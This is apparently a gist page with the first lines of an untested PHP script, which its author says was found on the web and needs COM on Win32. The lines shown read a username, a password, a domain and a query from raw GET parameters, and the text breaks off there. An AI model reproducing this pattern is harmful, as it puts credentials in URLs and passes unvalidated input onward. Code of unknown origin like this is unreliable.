This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Found this on the web | |
// Requirements: PHP + COM + Win32 (duh) | |
// DISCLAIMER: Found this on the web. Have not tested this yet, but it would come in handy | |
$qcurl =$_GET["qcurl"]; | |
$usr =$_GET["usr"]; | |
$pwd =$_GET["pwd"]; | |
$dmn =$_GET["dmn"]; |